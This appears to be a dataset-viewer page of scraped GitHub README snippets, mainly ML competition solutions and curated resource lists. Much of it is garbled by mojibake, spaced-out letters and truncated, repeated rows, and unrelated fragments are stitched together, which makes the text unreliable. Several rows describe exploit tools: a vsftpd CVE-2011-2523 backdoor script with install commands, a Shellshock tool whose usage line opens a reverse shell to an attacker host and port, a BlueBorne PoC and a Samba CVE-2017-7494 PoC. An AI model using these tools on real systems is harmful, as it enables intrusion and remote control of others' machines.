text stringlengths 0 59.8k |
|---|
Trusted by the world's leading organizations ↘ Productivity The world's leading AI-powered developer platform. Start a free enterprise trial Let's build from here Sign up for Git Hub |
Productivity Accelerate innovation Our AI-powered platform increases the pace of software development. |
Over 100 million developers call Git Hub home Whether you're scaling your startup or just learning how to code, Git Hub is your home. Join the world's largest developer platform to build the innovations that empower humanity. Let's build from here. 3 |
This 7X times factor is based on data from the industry's longest running analysis of fix rates Veracode State of Software Security 2023, which cites the average time to fix 50% of flaws as 198 days vs. Git Hub's fix rates of 72% of flaws with in 28 days which is at a minimum of 7X faster when compared. The Total Ec... |
Trusted by the world's leading organizations ↘ Productivity The world's leading AI-powered developer platform. Start a free enterprise trial Let's build from here Sign up for Git Hub |
Productivity Accelerate innovation Our AI-powered platform increases the pace of software development. |
Over 100 million developers call Git Hub home Whether you're scaling your startup or just learning how to code, Git Hub is your home. Join the world's largest developer platform to build the innovations that empower humanity. Let's build from here. 3 |
This 7X times factor is based on data from the industry's longest running analysis of fix rates Veracode State of Software Security 2023, which cites the average time to fix 50% of flaws as 198 days vs. Git Hub's fix rates of 72% of flaws with in 28 days which is at a minimum of 7X faster when compared. The Total Ec... |
--Java代ç 审计知识点æ´ç†-Java |
ç§'大讯飞智æ... §è¥é”€æ¯”èµ›ä»‹ç»æ¯”赛地å€http://www. dcjingsai. com/common/cmpt/2018%E7%A7%91%E5%A4%A7%E8%AE%AF%E9%A3%9EAI%E8%90%A5%E9%94%80%E7%AE%97%E6%B3%95%E5%A4%A7%E8%B5%9B_%E6%8E%92%E8%A1%8C%E6%A6%9C. htmlæ°æ®é›†ä¸‹è1/21/2:链接:https://pan. baidu. com/s/10b Glly Cd Ba0gp SSq Tp3r TA 密ç :x0z6æ... |
-CVE-2011-2523This is a python3 script to exploit the CVE-2011-2523, the VSFTPD 2. 3. 4 Backdoor Command Execution, using socket and telnetlib modules# How to install ? bash# Install dependencies :pip3 install termcolor argparse# Git cloning the projectgit clone https://github. com/0x Sojal Sec/CVE-2011-2523. gitcd CVE... |
-CVE-2012-2661-Active Record-SQL-injection-Write up(bahasa melayu) |
[CVE-2014-6271] Shellshock-Remote-Command-Injection[CVE-2014-6271] Apache Shellshock Remote Command Injection tool for quick reverse shell and file browsing Shellshock Apache remote exploit Usage: . /Shellshock. py payload=reverse rhost=1. 2. 3. 4 page=3 lhost=5. 6. 7. 8 lport=1234 . /Shellshock. py payload=files rhos... |
-CVE-2017-0785-Blue Borne-Po CCVE-2017-0785 Blue Borne Po CGeneral Overview Armis Labs revealed a new attack vector endangering major mobile, desktop, and Io T operating systems, including Android, i OS, Windows, and Linux, and the devices using them. The new vector is dubbed “Blue Borneâ€, as it spread through the... |
Risk?The Blue Borne attack vector has several qualities which can have a devastating effect when combined. By spreading through the air, Blue Borne targets the weakest spot in the networks’ defense – and the only one that no security measure protects. Spreading from device to device through the air also makes Blu... |
Blue Borne attack spreads through the air. This works similarly to the two less extensive vulnerabilities discovered recently in a Broadcom Wi-Fi chip by Project Zero and Exodus. The vulnerabilities found in Wi-Fi chips affect only the peripherals of the device, and require another step to take control of the device.... |
devices at all. This makes Blue Borne one of the most broad potential attacks found in recent years, and allows an attacker to strike completely undetected. Next generation Bluetooth vulnerabilities In the past, most Bluetooth vulnerabilities and security flaws originated in issues with the protocol itself, which were... |
to ensure a safe, secure, and coordinated response to the vulnerabilities identified. Google – Contacted on April 19, 2017, after which details were shared. Released public security update and security bulletin on September 4th, 2017. Coordinated disclosure on September 12th, 2017. Microsoft – Contacted on Apr... |
leak (CVE-2017-0785) and the last allows an attacker to perform a Man-in-The-Middle attack (CVE-2017-0783). Examples of impacted devices: Google Pixel Samsung Galaxy Samsung Galaxy Tab LG Watch Sport Pumpkin Car Audio System Google has issued a security update patch and notified its partners. It was available to An... |
been pushed to the upstream projects. The information leak vulnerability was patched here, and the remote code execution was patched here Linux distributions have started to push updates as well, please look for specific updates made by your distribution. i OSAll i Phone, i Pad and i Pod touch devices with i OS 9. 3. ... |
attacker determined his target is using the Android operating system, he can use four of the vulnerabilities disclosed by Armis to exploit the device, or they can use a separate vulnerability to conduct a Man-in-The-Middle attack. Demo Android Information Leak Vulnerability (CVE-2017-0785)The first vulnerability in the... |
level of the BNEP service – the Personal Area Networking (PAN) profile – which is responsible for establishing an IP based network connection between two devices. In this case, the memory corruption is larger, but can still be leveraged by an attacker to gain full control over the infected device. Similar to the ... |
configure IP routing and force the device to transmit all communication through it. This attack does not require any user interaction, authentication or pairing, making it also practically invisible. Blue Borne attack on Linux Armis has disclosed two vulnerabilities in the Linux operating system which allow attackers ... |
for gaining full control of an i OS device. However, this vulnerability still poses great risk to any i OS device prior to version 10, as it is does not require any interaction from the users, or configuration of any sort on the targeted device. The vulnerability can be leveraged by an attacker to gain remote code ex... |
Io T devices only increasing, it is critical we can ensure these types of vulnerabilities are not exploited. This is the primary mission of Armis in this new connected age. To run, be sure to have pybluez and pwntools installed. sudo apt-get install bluetooth libbluetooth-dev sudo pip install pybluez sudo pip insta... |
-CVE-2017-10271- (CVE-2017-10271)Javaååºåˆ—åŒ-æ¼æ´žJavaååºåˆ—åŒ-æ¼æ´žåˆ©ç”¨å·¥å... ·V1. 0 Javaååºåˆ—åŒ-相å... ³æ¼æ´žçš„æ£€æŸ¥å·¥å... ·ï¼Œé‡‡ç”¨JDK 1. 8版本开å',è1/2¯ä»¶å... 许å¿... 须安è£... JDK 1. 8æˆ-è€... 以上版本〠‚ |
-CVE-2017-7494-Samba-Exploit-POCAccording to researchers with Rapid7, over 110,000 devices appear on internet, which run stable Samba versions, while 92,500 seem to run unstable Samba versions, for which there is no fix. The newest Samba models, including the models 4. 6. x before 4. 6. 4, 4. 5. x before 4. 5. 10 and ... |
2018-CCF-BDCI-China-Unicom-Research-Institute-top2===============================================================================================================## 主办æ-¹ï¼šä¸å›1/2计算机å¦ä¼š & Data Fountain & ä¸å›1/2è”é€šç ”ç©¶é™¢## èµ›é“:2018-CCFå¤§æ°æ®ä¸Žè®¡ç®—智èƒ1/2大赛-é¢å'电信行业å‐ ˜é‡ç... |
详è§ï¼šplot. py(2018. 12. 03æ›´æ-°ï¼‰ |
2018 CCL-客æœé¢†åŸŸç”¨æˆ·æ„图分类éžå¸¸è£å¹¸èƒ1/2够å‚与这次 客æœé¢†åŸŸç”¨æˆ·æ„图分类比赛 å¾—äº†å† å†›çš„æˆç»©ã€‚若有任ä1/2想æ³å¯ä»¥æissueæˆ-è€... pull request〠‚以下是æˆ'ä»¬é˜Ÿä¼ HLT217的解决æ-¹æ¡ˆï¼ˆç”辩 PPTï¼‰ï¼Œæ„Ÿè° ¢æ‚¨çš„é˜... 读。## 解决æ-¹æ¡ˆ |
2018-DC-“达观æ¯â€æ-‡æœ¬æ™ºèƒ1/2å¤ „ç†æŒ'战赛éžå¸¸è£å¹¸èƒ1/2够å‚与 “达观æ¯â€æ-‡æœ¬æ™ºèƒ1/2å¤„ç†æŒ'战赛 å¹¶å-å¾— äº†å† å†›çš„æˆç»©ï¼Œä»¥ä¸‹æ˜¯æˆ'ä»¬é˜Ÿä¼ TNT_000_( 涛哥 ã€é¹å“¥ã€æˆ'ã€å˜‰ä¼Ÿå'Œæ™“è²ï¼‰ 的解决æ-¹æ¡ˆï¼ˆç”辩 PPT),感谢您的é˜... 读ï¼## 解决æ-¹æ¡ˆ ## 嘿ï¼å¦‚... |
„有 bugã€è§‰å¾—æˆ'对æŸä¸ªæ-¹æ³çš„è®²è§£ä¸æ‐ £ç¡®æˆ-è€... ä¸é€å1/2»ã€æœ‰æ›´åŠ æœ‰åˆ›æ„çš„è§è§£ï¼Œæ¬¢è¿Žéšæ— ¶å' issue æˆ-è€... pull request æˆ-è€... 直接与æˆ'讨论ï¼å¦å¤-您若èƒ1/2 star æˆ-è€... fork 这个项目,在下感激ä¸å°1/2~ |
2018-IJCAI-top3This is 2018 IJCAI alimama Top3 Code. 3/5204 We open source parts of the code and explain all the feature engineering. ## Introduction CTR estimation problem is a classic and valuable problem in the field of advertising algorithms. At present, the industry has a more mature solution to the problem of CT... |
2018-KUAISHOU-TSINGHUA-Top13-Solutions2018ä¸å›1/2é«˜æ ¡è®¡ç®—æœºå¤§èµ›--å¤§æ°æ®æŒ'战赛 Top 13 Solutions#### åˆèµ›A Top 2,åˆèµ›B Top 5 å¤èµ›Final 13 æ¯ä¸€æ¬¡ç›¸é‡éƒ1/2是ä¹... 别é‡é€¢ï¼Œä¸‹ä¸€æ¬¡ç«™åœ¨ç”辩å°ä¸Šåˆæ˜¯ä1/2å¹ ´ä1/2月,对得起自己,对得起é'春。 队å‹çš„RNN:https://github. com/to... |
df. groupby('author_id'). size(). sort_values(ascending=False). index[0] create_video_num = len(df[df['author_id']==most_author]['video_id']. unique()) watch_other_video_num = len(df[df['author_id']==most_author]['video_id']. unique()) watch_other_video = 1 if watch_other_video_num>1 else 0 return create_video_num ... |
2018ä¸å›1/2é«˜æ ¡è®¡ç®—æœºå¤§èµ›â€”â€”å¤§æ°æ®æŒ'战赛 P y t h o n P y t h o n 3. 5 3. 5 p a n d a s p a n d a s 0. 2 1. 0 0. 2 1. 0 n u m p y n u m p y 1. 1 3. 1 1. 1 3. 1 s c i k i t-l e a r n s c i k i t-l e a r n 0. 1 9. 1 0. 1 9. 1 ## 赛题æè¿° ​ 本次大赛基于脱æå'Œé‡‡æ ·åŽçš„æ°æ®ä¿¡æ¯ï¼Œé¢„测æœ... |
ä¸å›1/2é«˜æ ¡è®¡ç®—æœºå¤§èµ›-å¤§æ°æ®æŒ'战赛(A榜:rank 1,B榜:rank 2ï¼‰è¯„ä»·æŒ‡æ ‡F1ï¼Œè¯¥åæ¨¡åž‹A榜0. 822173,B榜0. 819342〠‚å'Œé˜Ÿå‹èžåˆA榜达到0. 822788,B榜达到0. 81985〠‚没有特别å... ³æ³¨é˜ˆå€¼ï¼ŒAB榜éƒ1/2一直æäº¤çš„å‰25000个。model_1这套æ-¹æ¡ˆé‡‡ç”¨çš„åˆ'窗æ-¹å¼æ˜¯æ¯ä¸€å¤©å... |
2018ä¸å›1/2é«˜æ ¡è®¡ç®—æœºå¤§èµ›â€”â€”Rank4 å¿«æ‰‹æ´»è·ƒç”¨æˆ·é¢ „测——lctry队解决æ-¹æ¡ˆç®€è¦ä»‹ç»èµ›é¢˜ï¼šâ€œå¿«æ‰‹â€æ-°æ³¨å†Œç”¨æˆ·è„±æå'Œé‡‡æ ·åŽçš„æ°æ®30天,预测未æ¥7å¤©æ ´»è·ƒçš„用户解决æ-¹æ¡ˆï¼šæ»'窗æ³ç‰¹åˆ«ç‰¹å¾ï¼šå› 为注册å¿... 登陆,行为èƒ1/2ä1/2“现用户的æŸç§æœ¬è´¨ï¼Œæ‰ ... |
2018-è... ¾è®¯å¹¿å'Šç®—æ³å¤§èµ›-相似人群拓å±2018 年第二届è... ¾è®¯å¹¿å'Šç®— æ³å¤§èµ›ï¼š ç›¸ä¼¼äººç¾¤æ‹“å± ã€‚åˆèµ›ï¼š 10th/1563 (Top 0. 64%) ï¼›å¤èµ›ç”±äºŽè¦åŽ»å®žä¹ å°±å¼ƒèµ›äº†ã€‚ 纯 LGB æ-¹æ¡ˆ 。## 嘿ï¼å¦‚果您有任ä1/2的想æ³ï¼Œä¾‹å¦‚:å'现æŸå¤ „有 bugã€è§‰å¾—æˆ'对æŸä¸ªæ-¹æ³çš„è®²è§£ä¸æ... |
2018å¹´"达观æ¯"æ-‡æœ¬æ™ºèƒ1/2å¤„ç†æŒ'战赛-é¿æ-‡æœ¬åˆ†ç±»-rank4éžå¸¸æ„Ÿè° ¢è¾¾è§‚æ¯ç»™æˆ'们æä¾›è¿™æ¬¡æœºä¼šä»¥åŠç§'èµ›å¹³å°æä¾›äº†å¾ˆæ£'çš„GPUï¼Œå†æ¬¡æ„Ÿè° ¢ã€‚### 赛题ç1/2'å€ï¼š “达观æ¯â€æ-‡æœ¬æ™ºèƒ1/2å¤„ç†æŒ'战赛 ### ä»»åŠ¡ï¼šè¾¾è§‚æ°æ®æä¾›äº†ä¸€æ‰¹é¿æ-‡æœ¬æ°æ®å'Œåˆ†ç±»ä¿¡æ¯ï¼Œç»“åˆå1... |
Awesome Dev Sec Ops Platforms A curated list of awesome platforms,including CTF/Security Response Center/Bug Tracker and so on. ### Security Response Center- Awesome Security Response Center Platforms ### Capture The Flag -Awesome CTF Platforms ### Bug Tracker- Awesome Bug Tracker Platforms ### Threat Intelligence-A... |
Awesome-Earth-Artificial-Intelligence S t a r s S t a r s 1 8 9 1 8 9 s l a c k s l a c k j o i n j o i n T w e e t T w e e t A curated list of tutorials, notebooks, software, datasets, courses, books, video lectures and papers specifically for Artificial Intelligence (AI) use cases in Earth Science. Maintained b... |
the computing costs? || Hydrosphere | How to do high spatio-temporal resoluton waterbody mapping? How to get insights of water quality from remote sensing? How to monitor, and predict snow melt as a water resource? || Biosphere | How to do high spatio-temporal resoluton forest mapping? How to do high spatio-temporal re... |
series of Jupyter notebooks that walk you through the fundamentals of Machine Learning and Deep Learning in python using Scikit-Learn and Tensor Flow. * Trustworthy Artificial Intelligence for Environmental Science (TAI4ES) Summer School will be virtually the week of July 26-30, 2021. Artificial Intelligence for E... |
Snips NLU (Natural Language Understanding) is a Python library that allows to extract structured information from sentences written in natural language. * Minds DB - Minds DB is an Explainable Auto ML framework for developers built on top of Pytorch. It enables you to build, train and test state of the art ML model... |
performance ML model serving. * flashflight: -flashflight: A C++ standalone library for machine learning. * Xarray-Beam - Python library for building Apache Beam pipelines with Xarray datasets. :sunglasses: pygeoweaver - Python library for AI & geospatial workflow management, FAIRness, tangibility and productiv... |
training data Google Earth Engine Data Catalog University of California Irvine Machine Learning Repository Euro SAT Dataset - Euro SAT Dataset: Land Use and Land Cover Classification with Sentinel-2, * Awesome Satellite Imagery Datasets - Awesome Satellite Imagery Datasets: A curated list of deep learning trainin... |
Detector and Phase Picker. * Tropical Cyclone Windspeed Estimator - Winning solutions for Tropical Cyclone Wind Speed Prediction Competition| â-² Top || --- |## Videos Tutorial on Microsoft Azure Machine Learning Studio (Auto ML-Regression), created by Microsoft AI for Earth Project: AI Monitoring Coal-fired Powe... |
(AI)/machine learning (ML) GPU Hackthons -designed to help scientists, researchers and developers to accelerate and optimize their applications on GPUs. LANL Earthquake Prediction Hacker Earth | â-² Top || --- |## Communities ESIP Machine Learning Cluster * ESIP Agriculture and Climate Cluster | â-² Top || ... |
Awesome-Embedded A curated list of awesome embedded resource. Table of content- Awesome-Embedded - Interview - Embedded Software Skill -Common - MCU programming - Bare-metal programming (Don't need MCU) - MSP430 - TM4C123- MSP432 - STM32 - STM32F7 - STM8 - ESP8266 -Raspberry - Beaglebone - L... |
Introduction to Embedded Systems - The course is designed around labs, using TI MSP430 Launch Pad and Arduino Uno to discuss concepts such as basic I/O, timing and clocking, interupt handling, serial communication, embedded operating systems, synchronization, etc. msp430-template - A template for MSP430 firmware. ... |
bootloader Tests to program STM32 Nucleo in C with GCC ARM embedded toolchain and libopencm3 A demo project of Free RTOS running on a STM32F4 Discovery board. DFU Bootloader for STM32 chips Customizable Bootloader for STM32 microcontrollers. Lightweight USB device Stack for STM32 microcontrollers STM32 programm... |
journey Wi-FI ESP32 learning journey Sming -ESP8266/ESP32 Io T Framework ## Raspberry Raspberry Pi Bare Metal & related link Chibi OS/RT on the Raspberry Pi Raspberry Pi ARM based bare metal examples Bare metal Raspberry Pi 3 tutorials Open Projects: Raspberry, Beaglebone BSP A Real-Time Operating Syste... |
metal lab Exploring Raspberry Pi: Interfacing to the Real World with Embedded Linux {book} Exploring Raspberry Pi: Interfacing to the Real World with Embedded Linux {website} ## Beaglebone Beagle Bone Black I2C References Learning Beagle Bone Python Programming Simple implementation of an OS for the Beagle Boar... |
systems regardless of the hardware architecture. Buildroot - Simple, efficient and easy-to-use tool to generate embedded Linux systems through cross-compilation. ## Assembly GCC-Inline-Assembly-HOWTO Assembly programming ## RTOS List of open source real-time operating systems ROS Free RTOS Free RTOS - Explai... |
Raspberry Pi 2B tock - A secure embedded operating system for Cortex-M based microcontrollers. Ali OS-Things - Ali OS Things released by Alibaba is an open-source implementation of operating system (OS) for Internet of Things (Io T). Co RTOS & Co RTOS Simple Cooperative RTOS - An open source minimalist RTOS. ... |
Windows Embedded Compact BSP for Raspberry Pi Windows Embedded Board Support Package for Beagle Bone ## Compiler ARM Compiler - armasm User Guide ## Bootloader Writing a boot loader in Assembly and C Writing a Bootloader Part 3 A bootloader for ARM Cortex-M based microcontrollers Open BLT - an open source and ... |
Generic_MCU_Software_Infrastructure - Provide necessary software infrastructure, service, macros to support some high level abstruct concept or paradigm, such as OOPC, FSM, delegate (event-driven) and etc. apollo - An open autonomous driving platform. * A Development Environment for ARM Trust Zone with Global Pla... |
Debugging tool for MSP430 MCUs pycs - Python Based ARM Core Sight Debug and Trace Tools Naive Systems Analyze - Static Analysis Tool for Code Security and Compliance## Tips & tricks Awesome Cheat Sheets > Awesome Cheat Sheets for Developer Utility, like Git, Vim , Tmux, Sublime Text, Markdown, Shell. Vim Config... |
Awesome Federated Machine Learning Federated Learning (FL) is a new machine learning framework, which enables multiple devices collaboratively to train a shared model without compromising data privacy and security. FL This repository aims to keep tracking the latest research advancements of federated learning, includi... |
+ Application + Boosting + Incentive mechanism + Unsupervised Learning + Heterogeneity + Client Selection + Graph Neural Networks + Other Machine Learning Paradigm + Computational Learning Theory - Google FL Workshops - Videos and Lectures - Tutorials and Blogs - Open-Sources + ... |
Optimization Alibaba code Federated Hypergradient Computation via Aggregated Iterative Differentiation University at Buffalo Personalized Federated Learning with Inferred Collaboration Graphs Shanghai Jiao Tong University code Secure Federated Correlation Test and Entropy Estimation Carnegie Mellon University code Doub... |
ICML 2022 Communication-Efficient Adaptive Federated Learning Pennsylvania State University slide video Personalized Federated Learning via Variational Bayesian Inference Chinese Academy of Sciences code video QSFL: A Two-Level Uplink Communication Optimization Framework for Federated Learning Nankai University code sl... |
Debiasing Model Updates for Improving Personalized Federated Training Boston University; Arm video One for One, or All for All: Equilibria and Optimality of Collaboration in Federated Learning Toyota; Berkeley; Cornell University code video CRFL: Certifiably Robust Federated Learning against Backdoor Attacks UIUC; IBM ... |
Privacy-Utility Tradeoff in Federated Learning ETH Zurich code The Best of Both Worlds: Accurate Global and Personalized Models through Federated Learning with Data-Free Hyper-Knowledge Distillation The University of Texas at Austin Per Fed Mask: Personalized Federated Learning with Optimized Masking Vectors The Univer... |
Clusters code Hybrid Local SGD for Federated Learning with Heterogeneous Communications University of Texas; Pennsylvania State University On Bridging Generic and Personalized Federated Learning for Image Classification The Ohio State University code Minibatch vs Local SGD with Shuffling: Tight Convergence Bounds and B... |
Neur IPS 2023 Federated Learning Rice University code Lockdown: Backdoor Defense for Federated Learning with Isolated Subspace Training Georgia Institute of Technology code Fed Game: A Game-Theoretic Defense against Backdoor Attacks in Federated Learning The Pennsylvania State University code Towards Personalized Feder... |
Neur IPS 2022 Skewness Zhejiang University DENSE: Data-Free One-Shot Federated Learning Zhejiang University Federated Submodel Optimization for Hot and Cold Data Features Shanghai Jiao Tong University code Soteria FL: A Unified Framework for Private Federated Learning with Communication Compression CMU code Factorized-... |
smoothness and Beyond Improved Differential Privacy for SGD via Optimal Private Linear Operators on Adaptive Streams University of Wisconsin-Madison Decentralized Gossip-Based Stochastic Bilevel Optimization over Communication Networks HKUST Asymptotic Behaviors of Projected Stochastic Approximation: A Jump Diffusion P... |
Partial Fed: Cross-Domain Personalized Federated Learning via Partial Initialization Huawei Home Page Federated Split Task-Agnostic Vision Transformer for COVID-19 CXR Diagnosis KAIST Home Page Addressing Algorithmic Disparity and Performance Inconsistency in Federated Learning Tsinghua University; Alibaba; Weill Corne... |
2017 CMU ## Top Computer Vision Conferences In this section, we will summarize Federated Learning papers accepted by top computer vision conference, Including CVPR, ICCV, ECCV. ### CVPR Years Title Affiliation Materials CVPR 2023 STDLens: Model Hijacking-Resilient Federated Learning for Object Detection Georgia Instu... |
Rethinking Architecture Design for Tackling Data Heterogeneity in Federated Learning Stanford University video code CD2-p Fed: Cyclic Distillation-guided Channel Decoupling for Model Personalization in Federated Learning Shanghai Jiao Tong University Fed Corr: Multi-Stage Federated Learning for Label Noise Correction S... |
Years Title Affiliation Materials ICCV 2021 Federated Learning for Non-IID Data via Unified Feature Learning and Optimization Objective Alignment Peking University Ensemble Attention Distillation for Privacy-Preserving Federated Learning University at Buffalo Collaborative Unsupervised Visual Representation Learning fr... |
Learning Shanghai Jiao Tong University code Delving into the Adversarial Robustness of Federated Learning Zhejiang University On the Vulnerability of Backdoor Defenses for Federated Learning Tongji University Echo of Neighbors: Privacy Amplification for Personalized Private Federated Learning with Shuffle Model Renmin ... |
AAAI 2020 Australia Federated Learning for Vision-and-Language Grounding Problems Peking University; Tencent Federated Latent Dirichlet Allocation: A Local Differential Privacy Based Framework Beihang University Federated Patient Hashing Cornell University Robust Federated Learning via Collaborative Machine Teaching Sy... |
KDD 2023 Track Fed Defender: Client-Side Attack-Tolerant Federated Learning KAIST code Serverless Federated AUPRC Optimization for Multi-Party Collaborative Imbalanced Data Mining University of Pittsburgh code Theoretical Convergence Guaranteed Resource-Adaptive Federated Learning with Mixed Heterogeneity Shandong Univ... |
Chinese Version Github - Federated Learning - A Comprehensive Overview of Methods and Applications English Version ## Papers### 1. Model Aggregation Model Aggregation (or Model Fusion) refers to how to combine local models into a shared global model. Papers Abbreviation Conferences/Affiliations Materials Communic... |
federated learning Survey paper:- Survey of Personalization Techniques for Federated Learning-Three Approaches for Personalization with Applications to Federated Learning- Personalized Federated Learning for Intelligent Io T Applications: A Cloud-Edge based Framework Methodology Papers Conferences/Affiliations Materi... |
### 3. Recommender system Recommender system (Rec Sys) is widely used to solve information overload. In general, the more data Rec Sys use, the better the recommendation performance we can obtain. Traditionally, Rec Sys requires the data that are distributed across multiple devices to be uploaded to the central dat... |
R-GAP: RECURSIVE GRADIENT ATTACK ON PRIVACY (KU Leuven, Belgium) Code Auditing Privacy Defenses in Federated Learning via Generative Gradient Leakage CVPR 2022 (University of Tennessee;Oak Ridge National Laboratory) Code Model Poison Attack Analyzing Federated Learning through an Adversarial Lens ICML 2019 (Princeton U... |
Incentive A Comprehensive Survey of Incentive Mechanism for Federated Learning A Survey of Incentive Mechanism Design for Federated Learning Incentive Mechanisms for Federated Learning:From Economic and Game Theoretic Perspective Applications A Survey on Federated Learning and its Applications for Accelerating Industri... |
Algorithm Sketching Optimization Code Acceleration for Compressed Gradient Descent in Distributed and Federated Optimization Optimization Slide Video Fed Boost: A Communication-Efficient Algorithm for Federated Learning Optimization Video Federated Learning: Strategies for Improving Communication Efficiency Optimizatio... |
End of preview. Expand in Data Studio
README.md exists but content is empty.
- Downloads last month
- 8